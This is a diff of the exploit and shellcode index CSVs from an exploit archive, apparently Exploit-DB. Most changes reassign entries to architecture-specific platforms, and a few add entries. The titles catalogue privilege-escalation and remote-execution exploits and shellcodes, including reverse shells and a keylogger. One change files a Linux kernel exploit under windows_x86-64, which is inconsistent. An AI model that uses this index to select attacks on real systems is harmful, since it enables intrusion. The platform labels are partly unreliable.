Krahmer",local,linux, -43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows, +43366,exploits/windows_x86/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows_x86, 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows, 43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'NamedObj ' Kernel Loader",2017-12-27,Specter,local,hardware, 43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux, @@ -10342,7 +10342,7 @@ id,file,description,date,author,type,platform,port 42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows, 42426,exploits/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows, 42429,exploits/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,local,windows, -42432,exploits/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,local,windows, +42432,exploits/windows_x86/local/42432.cpp,"Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,local,windows_x86, 42435,exploits/windows_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,local,windows_x86-64, 42454,exploits/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Local Privilege Escalation",2017-08-14,Securify,local,macos, 42455,exploits/windows/local/42455.py,"ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows, @@ -10373,7 +10373,7 @@ id,file,description,date,author,type,platform,port 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, 42921,exploits/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow",2017-09-29,"Touhid M.Shaikh",local,windows, -42930,exploits/windows/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",local,windows, +42930,exploits/windows_x86/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",local,windows_x86, 42936,exploits/linux/local/42936.md,"UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation",2017-10-02,Sysdream,local,linux, 42937,exploits/linux/local/42937.md,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,local,linux, 42948,exploits/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",local,osx, @@ -10391,7 +10391,7 @@ id,file,description,date,author,type,platform,port 43109,exploits/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Local Privilege Escalation",2017-11-01,"Parvez Anwar",local,windows, 43127,exploits/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP/Chrome Sandbox Privilege Escalation",2017-11-06,"Chris Salls",local,linux, 43134,exploits/windows/local/43134.c,"Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass",2017-11-10,hyp3rlinx,local,windows, -43139,exploits/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation",2017-11-13,"Parvez Anwar",local,windows, +43139,exploits/windows_x86-64/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation",2017-11-13,"Parvez Anwar",local,windows_x86-64, 43156,exploits/windows/local/43156.py,"VX Search 10.2.14 - 'Proxy' Local Buffer Overflow (SEH)",2017-11-16,wetw0rk,local,windows, 43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows, 43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows, @@ -10430,7 +10430,7 @@ id,file,description,date,author,type,platform,port 44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux, 44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader",2016-04-27,"Carlos Pizarro",local,hardware, 44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows, -38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows, +38457,exploits/windows_x86/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows_x86, 44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos, 44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos, 44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx, @@ -10445,9 +10445,9 @@ id,file,description,date,author,type,platform,port 44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux, 44282,exploits/hardware/local/44282.txt,"Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)",2018-03-10,qwertyoruiop,local,hardware, 44298,exploits/linux/local/44298.c,"Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation",2018-03-16,"Bruce Leidl",local,linux, -44299,exploits/linux/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2015-08-26,"Vitaly Nikolenko",local,linux, -44300,exploits/linux/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2016-07-04,"Vitaly Nikolenko",local,linux, -44302,exploits/linux/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux, +44299,exploits/linux_x86-64/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2015-08-26,"Vitaly Nikolenko",local,linux_x86-64, +44300,exploits/linux_x86-64/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2016-07-04,"Vitaly Nikolenko",local,linux_x86-64, +44302,exploits/linux_x86-64/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux_x86-64, 44303,exploits/linux/local/44303.c,"Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation",2017-12-11,anonymous,local,linux, 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware, 44307,exploits/macos/local/44307.m,"Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation",2018-03-20,"Google Security Research",local,macos, @@ -10511,7 +10511,7 @@ id,file,description,date,author,type,platform,port 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows, 46070,exploits/windows_x86/local/46070.py,"Ayukov NFTP FTP Client 2.0 - Buffer Overflow",2019-01-02,"Uday Mittal",local,windows_x86, 44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows, -44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows, +44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution",2018-05-21,smgorelik,local,windows, 44742,exploits/windows/local/44742.txt,"Flash ActiveX 18.0.0.194 - Code Execution",2018-02-13,smgorelik,local,windows, 44743,exploits/windows/local/44743.html,"Microsoft Internet Explorer 11 - javascript Code Execution",2016-02-01,checkpoint,local,windows, 44744,exploits/windows/local/44744.txt,"Flash ActiveX 28.0.0.137 - Code Execution (1)",2016-02-16,smgorelik,local,windows, @@ -10621,7 +10621,7 @@ id,file,description,date,author,type,platform,port 45501,exploits/windows/local/45501.txt,"EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation",2018-09-27,"Osanda Malith Jayathissa",local,windows, 45503,exploits/windows_x86-64/local/45503.txt,"PCProtect 4.8.35 - Privilege Escalation",2018-09-28,"Hashim Jawad",local,windows_x86-64, 45505,exploits/windows_x86/local/45505.py,"Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)",2018-10-01,SPARC,local,windows_x86, -45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux, +45516,exploits/linux_x86-64/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux_x86-64, 45528,exploits/linux/local/45528.txt,"virtualenv 16.0.0 - Sandbox Escape",2018-10-04,vr_system,local,linux, 45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)",2018-10-04,"Miguel Mendez Z",local,windows_x86, 45548,exploits/linux/local/45548.txt,"Git Submodule - Arbitrary Code Execution (PoC)",2018-10-05,"Junio C Hamano",local,linux, @@ -10648,7 +10648,7 @@ id,file,description,date,author,type,platform,port 45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64, 45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86, 45715,exploits/linux/local/45715.txt,"systemd - 'chown_one()' Dereference Symlinks",2018-10-29,"Google Security Research",local,linux, -45738,exploits/windows/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows, +45738,exploits/windows_x86-64/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows_x86-64, 45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd, 45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows, 45765,exploits/windows/local/45765.txt,"Anviz AIM CrossChex Standard 4.3 - CSV Injection",2018-11-02,LiquidWorm,local,windows, @@ -10720,7 +10720,7 @@ id,file,description,date,author,type,platform,port 46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows, 46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows, 46241,exploits/linux/local/46241.rb,"AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)",2019-01-24,Metasploit,local,linux, -46249,exploits/linux/local/46249.py,"MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation",2019-01-28,d7x,local,linux, +46249,exploits/linux_x86/local/46249.py,"MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation",2019-01-28,d7x,local,linux_x86, 46255,exploits/windows/local/46255.py,"Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH)",2019-01-28,"Nawaf Alkeraithe",local,windows, 46265,exploits/windows/local/46265.py,"R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)",2019-01-28,"Dino Covotsos",local,windows, 46267,exploits/windows/local/46267.py,"BEWARD Intercom 2.3.1 - Credentials Disclosure",2019-01-28,LiquidWorm,local,windows, @@ -10746,7 +10746,7 @@ id,file,description,date,author,type,platform,port 46428,exploits/macos/local/46428.m,"Apple macOS 10.13.5 - Local Privilege Escalation",2019-02-13,Synacktiv,local,macos, 46479,exploits/windows/local/46479.txt,"Cisco WebEx Meetings < 33.6.6 / < 33.9.1 - Privilege Escalation",2019-03-01,SecureAuth,local,windows, 46437,exploits/windows/local/46437.txt,"Memu Play 6.0.7 - Privilege Escalation",2019-02-21,"Alejandra Sánchez",local,windows, -46507,exploits/windows/local/46507.py,"Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)",2019-03-07,Hodorsec,local,windows, +46507,exploits/windows_x86/local/46507.py,"Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)",2019-03-07,Hodorsec,local,windows_x86, 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64, 46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware, 46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows, @@ -10803,10 +10803,10 @@ id,file,description,date,author,type,platform,port 46879,exploits/solaris/local/46879.c,"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",2019-05-20,"Marco Ivaldi",local,solaris, 47147,exploits/linux/local/47147.txt,"Docker - Container Escape",2019-07-19,dominikczarnotatob,local,linux, 46916,exploits/windows/local/46916.txt,"Microsoft Windows 10 (17763.379) - Install DLL",2019-05-23,SandboxEscaper,local,windows, -46917,exploits/windows/local/46917.txt,"Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows, +46917,exploits/windows/local/46917.txt,"Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows, 46912,exploits/windows/local/46912.txt,"Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation",2019-05-23,"Google Security Research",local,windows, 46914,exploits/macos/local/46914.rb,"Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)",2019-05-23,Metasploit,local,macos, -46918,exploits/windows/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows, +46918,exploits/windows_x86/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows_x86, 46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows, 46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,Arch-Vile,local,windows, 46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow",2019-05-24,"Uday Mittal",local,windows, @@ -10832,7 +10832,7 @@ id,file,description,date,author,type,platform,port 47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows, 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows, 47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows, -47122,exploits/windows/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows, +47122,exploits/windows_x86-64/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows_x86-64, 47126,exploits/windows/local/47126.py,"DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)",2019-07-16,"Xavi Beltran",local,windows, 47128,exploits/windows/local/47128.rb,"Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)",2019-07-16,Metasploit,local,windows, 47133,exploits/linux/local/47133.txt,"Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME",2019-07-17,"Google Security Research",local,linux, @@ -10846,13 +10846,13 @@ id,file,description,date,author,type,platform,port 47167,exploits/linux/local/47167.sh,"Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)",2019-01-04,bcoles,local,linux, 47168,exploits/linux/local/47168.c,"Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation",2018-12-29,bcoles,local,linux, 47169,exploits/linux/local/47169.c,"Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)",2018-12-29,bcoles,local,linux, -47170,exploits/linux/local/47170.c,"Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2018-12-29,bcoles,local,linux, +47170,exploits/windows_x86-64/local/47170.c,"Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation",2018-12-29,bcoles,local,windows_x86-64, 47171,exploits/multiple/local/47171.sh,"VMware Workstation/Player < 12.5.5 - Local Privilege Escalation",2018-12-30,bcoles,local,multiple, 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple, 47175,exploits/multiple/local/47175.sh,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2018-12-30,bcoles,local,multiple, 47173,exploits/multiple/local/47173.sh,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)",2019-01-13,bcoles,local,multiple, 47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple, -47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows, +47176,exploits/windows_x86/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows_x86, 47197,exploits/multiple/local/47197.rb,"SilverSHielD 6.x - Local Privilege Escalation",2019-08-01,"Ian Bredemeyer",local,multiple, 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux, 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows, @@ -11075,7 +11075,7 @@ id,file,description,date,author,type,platform,port 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows, 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows, 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows, -48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows, +48314,exploits/windows_x86/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows_x86, 48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows, 48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows, 48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos, @@ -11084,7 +11084,7 @@ id,file,description,date,author,type,platform,port 48346,exploits/windows/local/48346.py,"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)",2020-04-20,boku,local,windows, 48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows, 48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows, -48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows, +48352,exploits/windows_x86/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows_x86, 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris, 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows, 48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows, @@ -17606,7 +17606,7 @@ id,file,description,date,author,type,platform,port 43411,exploits/windows/remote/43411.rb,"HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)",2018-01-01,Metasploit,remote,windows,54345 43412,exploits/unix/remote/43412.rb,"Cambium ePMP1000 - 'ping' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,unix, 43413,exploits/cgi/remote/43413.rb,"Cambium ePMP1000 - 'get_chart' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,cgi, -44275,exploits/windows/remote/44275.txt,"DEWESoft X3 SP1 (64-bit) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows, +44275,exploits/windows_x86-64/remote/44275.txt,"DEWESoft X3 SP1 (x64) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows_x86-64, 43428,exploits/hardware/remote/43428.py,"Iopsys Router - 'dhcp' Remote Code Execution",2017-12-23,neonsea,remote,hardware, 43429,exploits/hardware/remote/43429.rb,"Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)",2018-01-04,Metasploit,remote,hardware, 43430,exploits/linux/remote/43430.rb,"Xplico - Remote Code Execution (Metasploit)",2018-01-04,"Mehmet Ince",remote,linux,9876 @@ -18222,6 +18222,7 @@ id,file,description,date,author,type,platform,port 48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple, 48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware, 48650,exploits/xml/remote/48650.txt,"Microsoft Windows mshta.exe 2019 - XML External Entity Injection",2020-07-07,hyp3rlinx,remote,xml, +48657,exploits/windows/remote/48657.py,"CompleteFTP Professional 12.1.3 - Remote Code Execution",2020-07-09,1F98D,remote,windows, 48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, @@ -42650,6 +42651,7 @@ id,file,description,date,author,type,platform,port 48198,exploits/php/webapps/48198.txt,"Joomla! 3.9.0 < 3.9.7 - CSV Injection",2020-03-11,i4bdullah,webapps,php, 48199,exploits/php/webapps/48199.txt,"PlaySMS 1.4.3 - Template Injection / Remote Code Execution",2020-03-11,"Touhid M.Shaikh",webapps,php, 48200,exploits/php/webapps/48200.txt,"Wing FTP Server - Authenticated CSRF (Delete Admin)",2020-03-11,"Dhiraj Mishra",webapps,php, +48201,exploits/php/webapps/48201.py,"TeamCity Agent XML-RPC 10.0 - Remote Code Execution",2020-03-11,1F98D,webapps,php, 48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php, 48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java, 48204,exploits/php/webapps/48204.txt,"WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php, @@ -42961,3 +42963,4 @@ id,file,description,date,author,type,platform,port 48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php, 48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php, 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby, +48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index b4f57a163..8eaee23cf 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -18,7 +18,7 @@ id,file,description,date,author,type,platform 13257,shellcodes/bsdi_x86/13257.c,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86 13258,shellcodes/bsdi_x86/13258.c,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86 13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86 -13261,shellcodes/freebsd/13261.c,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd +13261,shellcodes/freebsd/13261.c,"FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd 13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86 13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86 @@ -926,11 +926,11 @@ id,file,description,date,author,type,platform 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86 -45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux +45940,shellcodes/linux_x86/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux_x86 